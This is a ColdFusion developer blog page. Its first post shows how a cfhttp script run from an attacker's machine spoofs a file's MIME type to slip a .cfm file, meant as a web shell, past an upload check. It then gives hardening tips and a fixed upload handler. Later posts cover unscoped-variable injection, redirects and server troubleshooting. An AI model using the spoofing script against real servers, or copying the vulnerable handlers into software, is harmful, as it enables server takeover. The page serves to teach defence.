Spoofing MIME Types with ColdFusion and CFHTTP

Think your file uploads are secure? Think again. The MIME type of an uploaded file is nothing more than the Content-Type header the client sends for that part of the multipart body, and any client can set it to whatever it likes. Using this very simple technique with ColdFusion installed locally, you can spoof the MIME type of any file and get it past an upload check that trusts that header, which is all it takes to land executable code on another server.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice this posts to an action page called uploadact.cfm, which only accepts JPEGs and GIFs. The action page handles the upload as follows; the accept attribute is compared against the Content-Type the client declared for the file, not against the bytes in the file:

<!--- uploadact.cfm: accepts the upload only if the declared MIME type is image/jpeg or image/gif --->
<cfif isDefined('form.fileUpload')>
<cffile
action='upload'
fileField='fileUpload'
destination='C:\path\to\upload'
accept='image/jpeg,image/gif'
nameconflict='makeunique'>
<!--- accept is matched against the Content-Type header sent for this part; cffile.contentType
      reports that same client-supplied value, so neither proves what the file actually contains --->
<p>Thank you, your file has been uploaded.</p>
<p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part. We're going to write a page using cfhttp that runs on the attacker's server or workstation and uploads a file local to them, faking the MIME type with the mimetype attribute of cfhttpparam:

<!--- Runs on the attacker's machine: cfhttpparam type='file' lets the caller choose the
      Content-Type of the multipart part, so test.cfm is presented to uploadact.cfm as image/jpeg --->
<cfhttp
url='http://example.com/uploadact.cfm'
method='post'>
<cfhttpparam
type='formfield'
value='Upload File'
name='submit'>
<cfhttpparam
type='file'
name='FileUpload'
file='C:\PathTo\test.cfm'
mimetype='image/jpeg'>
</cfhttp>

With that in place we could upload a ColdFusion web shell (or an ASP one, if IIS serves ASP from the upload directory), which runs with the privileges of the ColdFusion service account and gives effectively full control of the server. So follow these tips:

  1. If you have an Enterprise license, use Sandbox Security. This limits each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry. If you can use Sandboxes, do this for each Sandbox, or set up a global Sandbox on your main site's directory. If you absolutely need cfexecute, remember that you can set up a Sandbox for a single folder with access to it and put the processing files there (say, to use FFmpeg for video conversion).
  3. Disable JSP (Adobe Instructions) if you don't actually use it. Since ColdFusion runs as System on Windows by default, any JSP file that makes its way to the server will have full access, and JSPs don't follow Sandboxes, so even if Sandboxes are set up they are of no use against a JSP.
  4. Run ColdFusion as another user (Adobe Instructions). Running ColdFusion as a less privileged user prevents total control of your server should something malicious get uploaded.
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this). The declared MIME type is attacker-controlled, so check the file extension and the file's contents as well, and store uploads outside the web root so that nothing that slips through can be executed.
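A hardened version of uploadact.cfm, added here as an example rather than taken from the post. It assumes a final directory C:\uploads\images\ that is not under the web root (change it for your server), uses GetTempDirectory() as the staging area (if you run Sandbox Security that directory needs read and write access in the Sandbox), and relies on IsImageFile(), which exists from ColdFusion 8 onward. The accept attribute is kept, but nothing depends on it; the extension whitelist and the content check are what actually decide.

```cfml
<!--- Hardened uploadact.cfm (added example, not the post's code).
      Assumptions: stagingDir is a temp directory the Sandbox can read and write,
      finalDir is outside the web root so nothing stored there is ever executed. --->
<cfset stagingDir = GetTempDirectory()>
<cfset finalDir   = "C:\uploads\images\">
<cfset allowedExt = "jpg,jpeg,gif">

<cfif isDefined("form.fileUpload")>
    <!--- 1. Land the file where it can never be executed, under a server-chosen name.
          accept still runs, but it only compares the Content-Type the client sent. --->
    <cffile action="upload"
            fileField="fileUpload"
            destination="#stagingDir#"
            accept="image/jpeg,image/gif"
            nameconflict="makeunique">
    <cfset uploaded = cffile.serverDirectory & "/" & cffile.serverFile>

    <!--- 2. Extension check on the name the client sent (cffile.clientFile).
          This is what decides whether ColdFusion would ever compile the file. --->
    <cfset ext = lcase(listLast(cffile.clientFile, "."))>
    <cfset ok  = listFindNoCase(allowedExt, ext) gt 0>

    <!--- 3. Content check: IsImageFile decodes the file. A .cfm relabelled as
          image/jpeg by cfhttpparam is not a decodable image and fails here. --->
    <cfif ok and not IsImageFile(uploaded)>
        <cfset ok = false>
    </cfif>

    <cfif ok>
        <!--- 4. Store under a generated name; the client never controls the stored filename --->
        <cfset newName = createUUID() & "." & ext>
        <cffile action="move" source="#uploaded#" destination="#finalDir##newName#">
        <p>Thank you, your file has been uploaded.</p>
    <cfelse>
        <!--- Reject: remove the staged file so nothing lingers in the temp directory --->
        <cffile action="delete" file="#uploaded#">
        <p>Only JPEG and GIF images are accepted.</p>
    </cfif>
    <p><a href="/">Return Home</a></p>
</cfif>
```

Run the cfhttp page above against this version and the spoofed test.cfm is deleted in step 3, while a real photograph passes all four steps. ColdFusion 10 and later also add a strict attribute to cffile action="upload" that inspects file content; on the ColdFusion 8 and 9 servers this post targets, the manual checks are the only option.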

ColdFusion Variable Scopes

Understanding how ColdFusion handles variable scopes is essential to keeping both your application and server running smoothly and avoiding performance decreases. Scoping a variable takes seconds at development time. I frequently talk with customers who have "memory leaks" and are quick to blame the application server; however, a ColdFusion application server that isn't running any code would not typically leak, so the code it runs is the first place to look.
The Scopes
Order of Evaluation
If you reference a variable name without a scope, ColdFusion has to search the scopes below, in order, to find it. On a very frequently requested page that search adds up to measurable slow-downs. It also means that, when the variable was never set in one of the earlier scopes, a URL, Form or Cookie value supplied by the client is what the lookup ends up finding.

  1. Function local (only UDFs and CFCs)
  2. Thread local (only inside threads)
  3. Arguments
  4. Variables
  5. Thread
  6. CGI
  7. Cffile
  8. URL
  9. Form
  10. Cookie
  11. Client

A variable that lives in any scope not in that list (Application, Session, Server, Request, and so on) must be referenced with its scope prefix to be found at all.
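What that search order means in practice, as an added example that is not part of the original post. It assumes an Application.cfc with session management on and a user struct stored in the session; the page, field names and the sumOrder function are made up for illustration.

```cfml
<!--- Added example (not the post's code). Assumes session.user exists with a role key. --->

<!--- Vulnerable: the flag is only written on one branch ... --->
<cfif structKeyExists(session, "user") and session.user.role eq "admin">
    <cfset variables.isAdmin = true>
</cfif>
<!--- ... and read back unscoped. When Variables holds no isAdmin, the search walks on down
      the list and a request for page.cfm?isAdmin=true satisfies it from the URL scope. --->
<cfif isDefined("isAdmin") and isAdmin>
    <cfoutput><a href="admin/">Site administration</a></cfoutput>
</cfif>

<!--- Fixed: give the flag a value in Variables before use and read it with its prefix,
      so the lookup stops at Variables and never reaches URL, Form or Cookie. --->
<cfparam name="variables.isAdmin" default="false">
<cfif structKeyExists(session, "user") and session.user.role eq "admin">
    <cfset variables.isAdmin = true>
</cfif>
<cfif variables.isAdmin>
    <cfoutput><a href="admin/">Site administration</a></cfoutput>
</cfif>

<!--- Inside functions, var-declare locals (ColdFusion 8 requires the var lines first) so the
      lookup stops at the function-local scope and two concurrent calls never share a
      counter through the Variables scope. --->
<cffunction name="sumOrder" access="public" returntype="numeric" output="false">
    <cfargument name="lines" type="array" required="true">
    <cfset var total = 0>
    <cfset var i = 0>
    <cfloop from="1" to="#arrayLen(arguments.lines)#" index="i">
        <cfset total = total + arguments.lines[i].qty * arguments.lines[i].price>
    </cfloop>
    <cfreturn total>
</cffunction>

<!--- Constructed sample input --->
<cfset order = [ {qty=2, price=9.5}, {qty=1, price=20} ]>
<cfoutput>Order total: #sumOrder(order)#</cfoutput>
```

The cfparam line is the cheap fix for existing pages: every later unscoped read of isAdmin now resolves at the Variables scope, so the performance point and the injection point are closed at the same time.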
Additional Reading

Jason Dean’s Security Series

Jason over at 12Robots.com has been writing a really great series of articles about secure application development for quite some time.  Since I haven’t seen them all in one index, I threw up links to all the articles on this page.

I'm pretty sure I got them all from Jason's site, but if I missed any just let me know in a comment.

ColdFusion Stops Serving After a Few Requests

Just had an issue where ColdFusion would only serve a few requests before locking up and sending constant 503 errors. Turns out there were almost 200k files in C:\Coldfusion8\runtime\servers\coldfusion\SERVER-INF\temp\wwwroot-tmp. So, to fix this I stopped ColdFusion, renamed wwwroot-tmp to wwwroot-tmp2 and made a new wwwroot-tmp. Once ColdFusion was started it ran like a champ again. My theory is the disk I/O was killing CF when it was looking for a cached file.

cfimage CAPTCHA Timer already cancelled

I’ve been running into this error more often lately.  Customers using cfimage to create a captcha image will sometimes get the following error when creating the image:

java.lang.IllegalStateException: Timer already cancelled.

It appears this is related to Java not having enough memory to create an image, yet ColdFusion still has enough to run and serve pages, which means you have to restart ColdFusion at that point.
Anyone else run into this, or know of a way to prevent it?

ColdFusion Verity – Unable to create temporary file

While working on a ticket today, I came across an interesting error message while trying to index or refresh a Verity collection.

Unable to create temporary file
java.lang.SecurityException: Unable to create temporary file
	at java.io.File.checkAndCreate(File.java:1701)
	at java.io.File.createTempFile(File.java:1793)
	at coldfusion.tagext.search.IndexTag.doQueryUpdate(IndexTag.java:702)
	at coldfusion.tagext.search.IndexTag.doStartTag(IndexTag.java:160)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfindexverity2ecfm902179424.runPage(C:\Websites\41334eae\indexverity.cfm:32)
	at coldfusion.runtime.CfJspPage.invoke(CfJspPage.java:196)
	at coldfusion.tagext.lang.IncludeTag.doStartTag(IncludeTag.java:370)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfApplication2ecfc1112783929$funcONREQUEST.runFunction(C:\Websites\41334eae\Application.cfc:205)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:418)
	at coldfusion.runtime.UDFMethod$ReturnTypeFilter.invoke(UDFMethod.java:360)
	at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:324)
	at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:59)
	at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:277)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:192)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:448)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:308)
	at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:74)
	at coldfusion.runtime.AppEventInvoker.onRequest(AppEventInvoker.java:243)
	at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:269)
	at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48)
	at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40)
	at coldfusion.filter.PathFilter.invoke(PathFilter.java:86)
	at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70)
	at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28)
	at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38)
	at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46)
	at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38)
	at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22)
	at coldfusion.CfmServlet.service(CfmServlet.java:175)
	at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:86)
	at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42)
	at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at com.seefusion.Filter.doFilter(Filter.java:49)
	at com.seefusion.SeeFusion.doFilter(SeeFusion.java:1471)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at jrun.servlet.FilterChain.service(FilterChain.java:101)
	at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
	at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
	at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
	at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
	at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203)
	at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
	at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
	at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
	at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)

Turns out that if you are using Sandbox Security you'll need to add the directory returned by the GetTempDirectory() function to your Sandbox with read and write permissions, and indexing will start working again.

cfimage CAPTCHA Not Displaying

You may occasionally run into a problem with ColdFusion and IIS where your CAPTCHA images created by cfimage are simply blank and look like they don't exist. Assuming you don't have a corrupt installation, the following instructions will help fix this.

  1. Open IIS
  2. Expand the server you're working with by clicking the plus sign and go to the properties for "Web Sites"
  3. In the Home Directory tab click on “Configuration”
  4. You should now be on the “Application Configuration” screen, select the Wildcard Mapping at the bottom which goes to cfroot/runtime/lib/wsconfig/1/jrun_iis6_wildcard.dll and hit Edit
  5. Make sure "Verify that file exists" is unchecked and hit OK until you're back at the IIS Manager.

This should correct any issues you had with cfimage and many other tags that also create things “on the fly” in ColdFusion.

ColdFusion Redirects

If you don't have access to mod_rewrite or an ISAPI rewrite plugin, you may have to use ColdFusion's built-in tags to force a redirect. Today I had a customer who wanted to force all traffic onto the www. host name of their domain. Examples of doing this are below:
Application.cfc
Do this in your onRequestStart function so it is checked on every request.

<cfif cgi.SERVER_NAME eq "domain.com">
<!--- The host name is compared against a literal. Build the new URL from the request path
      and keep the query string, which cgi.PATH_INFO on its own would drop --->
<cfset redirectUrl = "http://www.#cgi.HTTP_HOST##cgi.PATH_INFO#">
<cfif len(cgi.QUERY_STRING)>
<cfset redirectUrl = redirectUrl & "?" & cgi.QUERY_STRING>
</cfif>
<cflocation url="#redirectUrl#"
statuscode="301"
addtoken="no">
</cfif>

The benefit of this method is that it leaves subdomains alone (only the bare domain matches the check) and carries both the path and any URL parameters across to the www. host.
Application.cfm
You can use the same code in an Application.cfm file; put it near the top so it is processed before anything else on the request.
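The same redirect as a complete Application.cfc, added here as an example rather than taken from the customer's site. It assumes the application name "MySite", that cgi.HTTPS reports "on" for TLS requests, and uses cgi.SCRIPT_NAME instead of cgi.PATH_INFO so it behaves the same under IIS and Apache.

```cfml
<!--- Added example (not the post's code): www. redirect in Application.cfc.
      Assumptions: this.name is any name unique on the server; cgi.HTTPS is "on" over TLS. --->
<cfcomponent output="false">
    <cfset this.name = "MySite">

    <cffunction name="onRequestStart" returntype="boolean" output="false">
        <cfargument name="targetPage" type="string" required="true">
        <!--- ColdFusion 8 requires var declarations before any other statement --->
        <cfset var scheme = "http">
        <cfset var target = "">

        <!--- Literal comparison: a forged Host header cannot choose where we send the user --->
        <cfif cgi.SERVER_NAME eq "domain.com">
            <cfif cgi.HTTPS eq "on">
                <cfset scheme = "https">
            </cfif>
            <!--- Rebuild the URL from the literal host, the requested script and the query string --->
            <cfset target = scheme & "://www.domain.com" & cgi.SCRIPT_NAME>
            <cfif len(cgi.QUERY_STRING)>
                <cfset target = target & "?" & cgi.QUERY_STRING>
            </cfif>
            <!--- 301 so browsers and search engines remember the canonical host; cflocation ends the request --->
            <cflocation url="#target#" statuscode="301" addtoken="no">
        </cfif>

        <cfreturn true>
    </cffunction>
</cfcomponent>
```

A request for http://domain.com/products/list.cfm?cat=3 therefore answers 301 with Location: http://www.domain.com/products/list.cfm?cat=3, while shop.domain.com is not touched because it never equals the literal.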

ColdFusion Duplicate Application Names

I had to help a customer today who was having an issue where variables he set in his Application.cfm in a sub-folder were not being set. This was causing all kinds of issues, like the wrong DSN being used, which broke database updates. Turns out he had a similar Application.cfm in his admin folder, so I checked that out. What I found was that the admin one had a name of "SiteNameAdmin", but the secure folder (which was having issues) was simply "SiteName", exactly the same as the root of his site. So, I changed the name and voila, it worked perfectly.
More Reading
Ray Camden has a great blog post about this same issue:
http://www.coldfusionjedi.com/index.cfm/2007/4/12/Duplicate-Application-name-issue

ColdFusion Template Cache

This may seem obvious, but I always struggle to find the directory where ColdFusion's template cache writes its compiled class files:

[cf_root]\wwwroot\WEB-INF\cfclasses

One thing I noticed is that clicking the "Clear Template Cache" button in the ColdFusion Administrator does not remove these files; you should be able to delete them manually without problems, and they are regenerated the next time a template is requested. In production environments, where you won't have many code updates, turn Trusted Cache on. The benefit is that ColdFusion will no longer check whether the template being requested has changed on disk. If you do make code changes, you then need to either manually clear the cache or restart ColdFusion for the change to be picked up.
Additional Reading:
Tangling with the Template Cache